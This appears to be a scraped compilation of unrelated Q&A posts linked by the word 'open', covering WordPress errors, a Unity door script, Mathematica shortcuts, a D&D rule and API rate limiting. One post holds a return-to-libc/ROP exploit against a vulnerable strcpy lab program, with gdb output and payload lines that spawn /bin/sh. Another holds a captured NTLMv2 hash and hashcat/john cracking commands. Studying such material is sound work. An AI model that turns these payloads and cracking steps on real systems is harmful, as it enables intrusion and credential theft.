wp-blog-header.php): failed to open stream: No such file or directory in /home/

Need help with current error below. WP website is down and cannot even login to WP-admin. Anyone available to help resolve problem?

Warning: require(/home/mdvince/public_html/wp-blog-header.php): failed to open stream: No such file or directory in /home/mdvince/public_html/index.php on line 17

Fatal error: require(): Failed opening required ‘/home/mdvince/public_html/wp-blog-header.php’ (include_path=’.:/opt/alt/php74/usr/share/pear’) in /home/mdvince/public_html/index.php on line 17

Not able to open category post

my website home page working perfectly fine all links are clickable and opening, but when I open any menu or category page I’m not able to click and open the post. However, If I right-click and open the post in a new tab or window, it is opening perfectly fine. If I open customize preview mode then also all links are working fine. Does anyone know what is the issue here and how can I fix it?

The page I need help with: https://cominggames.com/category/best-and-worst/

Conditionally open nested, product sub category menus based on is_product_category( ) – Woocommerce

I have a complex product category menu in my woo shop sidebar with lots of sub menus. When the current category is one of the parent menu items, the menu item changes style. But when the current category is one of the nested, sub categories, the menu is closed, hiding the active menu item.

How can I force the menu to open to the current sub category and inherit the active menu item styles?

How to add a keyboard shortcut to open a Palette

I would like to add a hotkey or keyboard shortcut to open a Mathematica Palettte, like e.g. the Basic Math Assistant. I found a number of questions like this one or this one with answers suggesting to make changes to the KeyEventTranslations.tr file. But I could not figure out how to apply these ideas to make a shortcut for a general menu command.

How can I create a pressure pad in order to open a door?

I’m making a 2D platformer with Unity. I want to create a pressure pad in order to open a door and I want the door to open when the player is on the pressure pad and close in few seconds after the player leaves the pressure pad. I’ve tried different ways but none of them worked. In this case, the door should be open upwards and close downwards. Also, I already created some animations (idle, open and close) for the door but don’t know how to make a connection between these two objects then play the animations at the proper time. Thank you in advance.

using System.Collections; using System.Collections.Generic; using UnityEngine; using UnityEngine.Events;  public class PressureSwitch : MonoBehaviour {     public UnityEvent OnActivate;     public UnityEvent OnDeactivate;      int _objectsInContact;      void OnTriggerEnter(Collider other)     {         _objectsInContact++;         if (_objectsInContact == 1 && OnActivate != null) OnActivate.Invoke();     }      void OnTriggerExit(Collider other)     {         _objectsInContact--;         if (_objectsInContact == 0 && OnDeactivate != null) OnDeactivate.Invoke();     } } 

enter image description here

ROP execute a shell with execl() – /bin/sh: 0: Can’t open

A vulnerable C program to stack buffer overflow, requires 112 byte stuffing to get to return address of the calling function. Here the Strcpy() is the vulnerable function.

void f(char *name){   char buf[100];   strcpy(buf, name); }  void main(int argc, char *argv[]){   f(argv[1]); }  

Trying to write the rop gadgets to execute a /bin/sh shell by means of execl(). The exploit would be:

python -c 'print 112*"\x90" + "addr. execl()" + "addr. exit()" + "addr. /bin/sh" + "addr. /bin/sh"'   

From gdb these are the found addresses (ASLR disabled for test):

(gdb) print execl       $  1 =  0xb7eb7b60 <__GI_execl> (gdb) print exit       $  2 =  0xb7e359e0 <__GI_exit>  (gdb) info proc map  ...(output omitted) (gdb) find 0xb7e07000,0xb7fbb000,"/bin/sh"       0xb7f62b0b       1 pattern found. (gdb) x/s 0xb7f62b0b       0xb7f62b0b:   "/bin/sh"  (gdb) run $  (python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')       Starting program: /home/marco/asm/execve/bypass_aslr/rop/prove/main $  (python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')       process 3161 is executing new program: /bin/dash       /bin/sh: 0: Can't open UWVS��������       [Inferior 1 (process 3161) exited with code 0177] 

The same test using system() gives the shell.

I don’t understand if the execl() is successful and if it’s replacing the currently running process image.

Platform: Ubuntu 16.04 – 32 bit.

UPDATE: I added some gadgets to the exploit, and got back another result. In brief i added gets() to write the NULL byte as the third argument to pass to execl(). The exploit will write the stack in this order:

addr. exit() fake byte (NULL will be written here)   addr. /bin/sh addr. /bin/sh addr. pop\pop\pop\ret addr. execl() addr. where to write NULL byte addr. pop\ret addr. gets()        <-- ESP will be here when is time to return to caller             112 NOP 

from gdb i run the exploit, i type "new line" so gets() writes NULL to the provided address, and the result is:

[Inferior 1 (process 2793) exited normally] 

This time no errors, but again no shell.

EDIT2: this is the stack after gets() is executed and before execl().

The commands under gdb i used to take the stack layer:

(gdb) b 10     --> this is to stop after strcpy() in the .c code   Breakpoint 1 at 0x8048497: file main.c, line 10.  (gdb) run $  (python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')    Starting program: /home/marco/rop/main $  (python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')   Breakpoint 1, func (name=0xb7e2d06e <__ctype_get_mb_cur_max+30> "X3U0327") at main.c:10   (gdb) b *execl   Breakpoint 2 at 0xb7eb9a80: file execl.c, line 31.   (gdb) c   Continuing.    Breakpoint 2, __GI_execl (path=0xb7f64a0b "/bin/sh", arg=0xb7f64a0b "/bin/sh") at execl.c:31   31    execl.c: File o directory non esistente.   (gdb) x/x $  esp   0xbffff5ec:   0xb7ef334f   (gdb) x/x $  esp+4   0xbffff5f0:   0xb7f64a0b   (gdb) x/x $  esp+8   0xbffff5f4:   0xb7f64a0b   (gdb) x/4x $  esp+12   0xbffff5f8:   0x00    0x42    0x42    0x42   (gdb) x/s $  esp+12   0xbffff5f8:   "" 

Please note, this test was executed from another Ubuntu 16.04, and the addresses are now:

"\xe0\x83\xe6\xb7" +   -> gets() "\x6e\xd0\xe2\xb7" +   -> pop/ret "\xf8\xf5\xff\xbf" +   -> address where to write NULL "\x80\x9a\xeb\xb7" +   -> execl() "\x4f\x33\xef\xb7" +   -> pop/pop/pop/ret "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh   "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh "\x42\x42\x42\x42" +   -> fake address to be overwritten "\xd0\x79\xe3\xb7"     -> exit() 

Can you kill a Tarrasque with the Open Hand monk’s Quivering Palm feature?

I see the Tarrasque has Legendary Resistance so it can pass failed saving throws. It has a list of Legendary Actions 3 times a day. I keep seeing people say to keep making it do saves to get rid of the Legendary Resistance even though it is not listed under the limited Legendary actions.

Since the Way of the Open Hand monk’s Quivering Palm technique relies on failing a Constitution save to instantly reduce the target to 0 HP, can Quivering Palm kill a Tarrasque?

Can’t open hash with John or Hashcat

I’m trying to open a hash with John and HashCat, but both don’t work?

NTLMv2 Response Captured from 192.168.1.1 DOMAIN: DEV29-APP01 USER: testuser LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:3045e74dac0653865d353e93e8c5ca8c  NT_CLIENT_CHALLENGE:0101000000000000c2af33072879d60195da2f228ded77b7000000000200120041004e004f004e0059004d004f00550053000100120041004e004f004e0059004d004f00550053000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f00750073000800300030000000000000000000000000200000feb33cee8c0f22d8b27a15278ee7fdfbb47b23655ada87d2da7b3a3b1db5450e0a00100000000000000000000000000000000000090038004d005300530051004c005300760063002f003100360038002e00360033002e003100310031002e003100300036003a0031003400330033000000000000000000 

Manually rewritten to:

testuser::DEV29-APP01:3045e74dac0653865d353e93e8c5ca8c:0101000000000000c2af33072879d60195da2f228ded77b7000000000200120041004e004f004e0059004d004f00550053000100120041004e004f004e0059004d004f00550053000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f00750073000800300030000000000000000000000000200000feb33cee8c0f22d8b27a15278ee7fdfbb47b23655ada87d2da7b3a3b1db5450e0a00100000000000000000000000000000000000090038004d005300530051004c005300760063002f003100360038002e00360033002e003100310031002e003100300036003a0031003400330033000000000000000000  me>hashcat -m 5600 -a 3 testuser.txt --force Hashfile 'testuser.txt' on line 1 (testus...31003400330033000000000000000000): Separator unmatched No hashes loaded.  me>john --format=netntlmv2 testuser.txt Using default input encoding: UTF-8 No password hashes loaded (see FAQ) me>john --show --format=netntlmv2 testuser.txt 0 password hashes cracked, 0 left 

What am I missing?

API open endpoint best practices

I am currently developing an API for my front-end React application. All my routes (besides the two I’ll mention below) are secure by the use of JWTs. They get generated once a user logs in and is then used for the remainder of the session. The app to API connection will be over HTTPS so it should hinder MiTM attacks.

The two endpoints (which you have probably guessed) is the login and register endpoint. I have come across this question that suggests using HMAC. If I understand it correctly, the front end will create a hash (using a shared secret) of the request body and send it with the request; once the request arrives the API will generate a hash (with the same shared secret) based off of the request and compare the two hash values. If they don’t match then the request was tampered with or is fraudulent.

So that obviously verifies the integrity of the requests made. The other problem is now that, anyone can just spam the hell out of the endpoint and effectively DoS/DDoS the endpoint. Even though the requests are fraudulent, the request will still be tried to be verified on the API side by calculating the hash. Which takes compute power. So if I am getting a lot of requests, very quickly, it will drag my API down.

Would it be right to say that I need to rate-limit the endpoint based on the request IP address? Say limit the call to 10 per hour from a specific IP address? Would appreciate any feedback with regards how to stop the spamming of the endpoints.